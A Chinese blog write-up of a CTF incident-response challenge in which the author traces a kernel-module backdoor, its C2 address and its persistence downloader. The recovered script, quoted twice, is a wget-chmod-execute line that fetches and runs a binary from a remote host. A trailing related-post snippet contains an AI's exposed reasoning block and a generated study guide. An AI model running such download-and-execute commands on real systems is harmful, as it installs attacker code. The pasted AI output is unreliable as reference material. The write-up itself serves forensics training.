ciscn暨长城杯 天津赛区 ISW阶段应急响应复现

于 2025-03-19 11:08:51 发布
阅读量680 收藏 4
点赞数 7
文章标签: CTF Misc 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79355407/article/details/146363958
版权

题目介绍

小路是一名网络安全网管,据反映发现公司主机上有异常外联信息,据回忆前段时间执行过某些更新脚本(已删除),现在需要协助小路同学进行网络安全应急响应分析,查找木马,进一步分析,寻找攻击源头,获取攻击者主机权限获取 flag 文件。

1

找出主机上木马回连的主控端服务器 IP 地址(不定时 (3~5 分钟) 周期性),并以 flag{MD5} 形式提交,其中 MD5 加密目标的原始字符串格式 IP:port

这里一直分析netstat浪费了很多时间

复现时了解到:
这里是 `.ko` 内核相关文件,可能会遇到 `netstat` 检测不到网络连接情况的问题,优先使用 `tcpdump` 直接抓取网卡流量

使用r-studio进行磁盘恢复【AXIOM分析后并没有发现东西(可能是不太会用吧)】

发现被删除的1.txt,和.viminfo
image.png

1.txt

wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade && chmod +x /tmp/.system_upgrade && /tmp/.system_upgrade

定位到system
image.png
查看启动服务,发现可疑内核
image.png

定位到内核文件
image.png
恢复文件,IDA分析
定位到ULRYvXzICzy880dO函数,发现木马回连的主控端服务器 IP 地址

192.168.57.203:4948

image.png

flag{59110f555b5e5cd0a8713a447b082d63}

2

找出主机上驻留的远控木马文件本体,计算该文件的 MD5, 结果提交形式
这里注意到systemd-agentd
image.png
image.png

flag{bccad26b665ca175cd02aca2903d8b1e}

3

找出主机上加载远控木马的持久化程序(下载者),其功能为下载并执行远控木马,计算该文件的 MD5, 结果提交形式:flag{MD5}

木马就是system-upgrade.ko

计算文件md5:md5sum

image.png

flag{78edba7cbd107eb6e3d2f90f5eca734e }

4

查找题目 3 中持久化程序(下载者)的植入痕迹,计算持久化程序植入时的原始名称 MD5(仅计算文件名称字符串 MD5),并提交对应 flag{MD5}

1.txt

wget –quiet http://mirror.unknownrepo.net/f/l/a/g/system_upgrade -O /tmp/.system_upgrade && chmod +x /tmp/.system_upgrade && /tmp/.system_upgrade

这里下载文件并给予权限,

image.png

flag{9729aaace6c83b11b17b6bc3b340d00b}

参考文章:
https://tryhackmyoffsecbox.github.io/Target-Machines-WriteUp/blog/2025CCB&CISCN-Semis-ISW/

GzyNuli
关注
第一届长城杯信息安全铁人三项赛决赛 取证溯源 (复现)
m0_63138919的博客
09-14 1462
学习
【PWN · stack | vm逆向】[ 2024 · CISCN 长城杯 ] avm
Mr_Fmnwon的博客
12-16 1237
一个类似于操作系统的虚拟机,但是没有判断写长度,会越界,类似格式化字符串“读”写栈上的数据。所以我就想改ret到ROPchain,但是最后system("/bin/sh\x00")失败了,什么原因捏?
2024.12.15CISCN&长城杯铁人三项赛
2301_80395418的博客
12-15 788
刚开始比赛看到题目名字里面有Proxy 就先来做这个了(在最近的比赛中见到的proxy题比较多)题目进入之后给了源码源码当时看源码的时候 看到打开源码的方式是就下意识的搜了一下有没有merge函数(怀疑可能存在原型链污染, 属于条件反射了)看到这一块感觉应该可以用ssti进行命令执行就在本地起了一个环境。在我的这篇文章中拿了一个其他比赛的payload突然间想到在题目环境可能可以对app.py进行写入操作。就拿了这个payload直接打了一下。
2024长城杯&CISCN-威胁流量分析-zeroshell
2301_79248867的博客
12-17 942
ciscn zeroshell 复盘
2023年中职“网络安全“—Web 渗透测试②
weixin_57060854的博客
11-19 1920
在uploads/的后面输入%00,然后进行url进行解码,解码成一个不可见的字符。添加X-Forwarded-For后提示需要管理员才能登录,我们尝试把cookie的值改为1试试。php://filter 读取当前⻚⾯,在当前⻚⾯内容发现flag值。提示输入数字查询,猜测考的应该是sql注入,我们用sqlmap跑一下。提示我们只能本地访问,那我们就利用burp,添加一个本地访问的包。发现一个index.php.bak,访问之后获得flag。访问页面,发现一张图片,没有其他有用的信息。
2024-CISCN-长城杯铁人三项 初赛
Aluxian_的博客
12-16 1120
【代码】2024-CISCN-长城杯铁人三项 初赛。
2024CISCN长城杯初赛WP——WEB方向
konpure的博客
12-18 858
进入题目后F12打开控制台,可以得到两个文件,分别是hackme.php和tips.php,尝试用file参数进行读取,直接读取和php伪协议读取都无法读到,多次尝试后发现可以使用双写绕过读取。传入得到了phpinfo,可以看到中过滤了许多函数可以推测是绕过,然后传入查看文件,得到php代码如下将这段代码反混淆后可以得到一个密码是的木马文件,用蚁剑直接连接执行命令会得到,确定了是disable_functions的绕过使用绕过。
ciscn&长城杯 初赛 2025 pwn anote&novel1
YX-hueimie
12-16 2171
这次比赛看得出来,出题人很喜欢c++难度分配很不合理,本来说是4道题,结果上了6道,临时改规则也是厉害。按6道来说应该是2道难,2-3道中,1-2道简,但实际上是4道难,1道中,1道简,导致好多人做完简单题就开始坐牢了。3道iot题,还是后面放的,其中2道没人做,还有一道就2个人做出来了,感觉不像是给大学生出的,iot一般在企业中用的比较多,或者是出成48小时的赛题比较合理。vm没学就没做只做了两道,novel1拿了个三血,也算是稍微给学校加了点名气。
第一届长城杯 第三赛区 半决赛 AWD 源码
04-23
【标题】"第一届长城杯 第三赛区 半决赛 AWD 源码"指的是一个编程竞赛的源代码,很可能是参赛队伍在半决赛阶段使用的自动武器动态(AWD)系统的代码。这个标题揭示了这是一个与软件开发竞赛相关的内容,特别关注的是...
2025 长城杯 决赛 逆向 第二届 长城杯 国赛 逆向
05-03
2025 长城杯 决赛 逆向 第二届 长城杯 国赛 逆向
2025 长城杯 决赛 二进制 附件 第二届 长城杯 国赛 二进制 附件
05-03
2025 长城杯 决赛 二进制 附件 第二届 长城杯 国赛 二进制 附件
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8697
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2013年高职高专组C/C++预赛规则与题目类型解析:涵盖结果填空、代码填空与程序设计竞赛要求
最新发布
05-14
内容概要:本文档为2013年C/C++高职高专组预赛的考试规则和注意事项说明。文档详细介绍了考试流程、答题规范、提交方式以及各类题型的具体要求。考试时间共4小时,选手需通过浏览器提交答案。试题分为结果填空、代码填空和程序设计三种类型,分别要求直接填写结果、补充代码片段和编写完整的程序逻辑。所有编程题必须符合ANSI C++标准,不允许使用特定操作系统或编译器的特殊函数。文档还强调了代码的通用性和规范性,要求选手避免在代码中加入个人信息或无关内容,并确保代码能够处理不同输入数据。 适合人群:参加高职高专组C/C++编程竞赛的学生及准备类似竞赛的编程爱好者。 使用场景及目标:①帮助参赛选手熟悉竞赛规则和评分标准;②指导选手如何正确提交答案并遵循编程规范;③提高选手的编程能力和解题技巧,确保其能够在规定时间内高效完成任务。 其他说明:文档还特别提醒选手注意代码的通用性和规范性,避免因不符合要求而失分。同时,选手应提前熟悉ANSI C++标准,掌握常用库的使用方法,以应对不同类型的编程题目。
《机器人综合基础实践教程》(入门篇、提高篇)总结
05-14
内容概要:《机器人综合基础实践教程》(入门篇、提高篇)涵盖了机器人基础构建、编程控制、传感器应用等多个方面。教程从机械零件简介入手,逐步介绍主控板和编程环境的配置,随后通过一系列实验引导读者动手实践,包括驱动轮模块、双轮万向车、红外启动小车、带传动模块、履带机器人、红绿灯等实验。这些实验不仅帮助读者理解基本原理,还涉及高级应用如蓝牙电子温度计、语音识别、双轮小车平衡、蓝牙排爆机器人和WiFi视频排爆等。教程旨在培养读者的空间构型能力、编程技巧和综合调试能力,为机器人技术的实际应用打下坚实基础。 适用人群:具备一定编程基础和技术兴趣的学生、教师及爱好者,特别是对机器人技术感兴趣的初学者和中级学习者。 使用场景及目标:①帮助学生理解机器人基本原理,掌握机械零件组装和编程控制;②通过实际操作,提升编程和调试技能;③为机器人竞赛、项目开发和创新实践提供理论和实践指导;④培养创新思维和解决实际问题的能力。 其他说明:教程不仅提供详细的实验步骤和代码示例,还配有丰富的参考资料和光盘课件,确保学习者能够全面理解和掌握知识点。此外,教程强调实践操作的重要性,鼓励学习者通过动手实验加深理解,培养独立思考和解决问题的能力。
验证码生成器:Vue3Canvas的动态验证码.pdf
05-14
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿用作商业用途。 Vue 3是一款备受瞩目的JavaScript框架,它采用了基于Proxy的响应式系统,显著提升了性能和调试能力。其Composition API带来了更高效的逻辑组织方式,使代码复用变得轻而易举。Tree-shaking支持让打包后的文件体积更小,进一步优化了应用性能。Vue 3还与TypeScript深度集成,提供了更完善的类型推导,让开发过程更加顺畅。无论是构建大型应用还是小型项目,Vue 3都能凭借其出色的性能和灵活的架构,帮助开发者高效完成任务,是现代Web开发的理想选择。
苹果香蕉橘子分类图像数据集
05-14
苹果香蕉橘子分类图像数据集 关键词: 食物 描述: 主要是用来进行分类,包含新鲜的苹果、新鲜的橘子、新鲜的香蕉、腐烂的苹果、腐烂的橘子、腐烂的香蕉几类图片,每类有200-300张图片左右。
会员管理系统:Vue3+积分的规则引擎.pdf
05-14
文档支持目录章节跳转同时还支持阅读器左侧大纲显示和章节快速定位,文档内容完整、条理清晰。文档内所有文字、图表、函数、目录等元素均显示正常,无任何异常情况,敬请您放心查阅与使用。文档仅供学习参考,请勿用作商业用途。 Vue 3是一款备受瞩目的JavaScript框架,它采用了基于Proxy的响应式系统,显著提升了性能和调试能力。其Composition API带来了更高效的逻辑组织方式,使代码复用变得轻而易举。Tree-shaking支持让打包后的文件体积更小,进一步优化了应用性能。Vue 3还与TypeScript深度集成,提供了更完善的类型推导,让开发过程更加顺畅。无论是构建大型应用还是小型项目,Vue 3都能凭借其出色的性能和灵活的架构,帮助开发者高效完成任务,是现代Web开发的理想选择。
基于flask+socketio+pinecone+langchain+openai实现的定制化问答系统(AI垂直领域)+说明.zip
05-14
基于flask+socketio+pinecone+langchain+openai实现的定制化问答系统(AI垂直领域)+说明.zip 项目介绍 项目采用flask+socketio+pinecone+langchain+openai实现的一个定制化问答系统 支持流式问答 支持在线动态构建增量知识库 部署步驟 安装包 pip install -r requirements.txt 更换config.openai_setting.py文件中的 api_key 与 个人代理地址 更换config.pinecone_setting.py文件中的api_key 附申请地址: 见说明 执行load_txt.py文件导入数据(控制台无错误即表示导入完成,可查看pinecone数据库核验) 启动app.py在线实现流式问答与添加问答知识库 项目目录说明 base: 基础模块-存放了项目的基础类 base.load: 加载模块-临时存放了txt文件与pdf文件加载到向量数据库的操作 config: 配置模块-存放了项目的配置文件 data: 数据模块-存放了要加载的临时文件 template: 临时存放了测试用的html文件
2024长城杯密码学
03-18
<think>好的,我现在需要处理用户关于2024长城杯密码学比赛信息和学习资料的请求。首先,我需要检查用户提供的参考引用,看看是否有相关的资料可以直接引用。用户提供了三个引用,其中引用[2]和引用[3]提到了长城杯的密码学题目和取证溯源的内容。 用户的问题集中在密码学相关的比赛信息或学习资料,所以我应该优先关注引用[2],因为它明确提到了crypto部分的题解,包含了一个flag的示例。而引用[3]虽然涉及取证,但可能和密码学没有直接关联,不过可能需要确认是否有交叉内容。引用[1]则主要涉及比赛准备,安装了Wireshark等工具,这对网络分析可能有帮助,但不确定是否直接用于密码学。 接下来,我需要整理已有的信息。引用[2]提到了一个具体的题目,flag的格式为flag{p*q*r*s_32cacb2f994f6b42183a1300d9a3e8d6},这可能涉及到多素数分解或哈希处理。这可以作为解题思路的参考。此外,用户可能需要学习如何分析类似的密码学题目,比如RSA多素数分解、哈希算法识别等。 用户还希望获得学习资料,因此需要推荐相关资源。常见的密码学学习资料包括书籍如《密码编码学与网络安全》、CTF比赛平台如CTFtime,以及在线课程。同时,结合长城杯的特点,可能需要实践操作,如使用Python进行密码分析,工具如OpenSSL、John the Ripper等。 在生成相关问题部分,需要考虑用户可能的后续问题,例如具体题型的解法、备赛建议、实战资源等。需要确保问题有针对性,帮助用户深入理解。 需要验证是否有其他引用内容被遗漏,但根据提供的引用,引用[3]主要涉及应急响应和流量分析,可能与密码学关联不大,但流量分析中有时会涉及加密流量分析,这点可能需要提及,但优先级较低。 最后,确保回答结构清晰,分点列出比赛信息和学习资料,并且每个部分都有对应的引用支持。同时,生成的相关问题要引导用户进一步探索,例如具体解题方法或资料推荐。</think>### 2024长城杯密码学比赛信息及学习资料整理 #### 一、比赛信息与题型参考 1. **题目类型与示例** 根据2024长城杯初赛部分题解,密码学题目涉及多素数分解与哈希结合的综合题型。例如: $$flag\{p*q*r*s\_32cacb2f994f6b42183a1300d9a3e8d6\}$$ 此类题目可能需要分解多个素数$p,q,r,s$,并验证哈希值[^2]。 2. **赛前准备经验** 参赛者通常会通过分析往届题目(如安装Wireshark分析流量)、练习密码学工具(如Python脚本、OpenSSL)提升实战能力[^1]。 #### 二、推荐学习资料 1. **密码学基础书籍** - 《密码编码学与网络安全》:涵盖对称加密、非对称加密、哈希算法等核心内容。 -CTF竞赛权威指南(Pwn篇)》:包含密码学实战案例。 2. **实践平台与工具** - **CTF比赛平台**:CTFtime(汇总全球赛事)、攻防世界(含长城杯题型复现)。 - **工具库**:Python的`pycryptodome`库、RSA分解工具`yafu`。 3. **往届资源与题解** - 2024长城杯初赛密码学题解(参考示例中的多素数分解思路)。 - 第一届决赛取证题中的流量分析技巧(如使用Wireshark识别加密流量)[^3]。 #### 三、实战建议 1. **重点题型训练** - 多素数RSA分解(涉及大整数分解算法) - 哈希碰撞与彩虹表攻击(如示例中的`32cacb...`后缀) 2. **模拟环境搭建** - 在Linux系统中配置Python密码学开发环境,例如: ```python from Crypto.Util.number import bytes_to_long, getPrime p = getPrime(512) # 生成512位素数 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值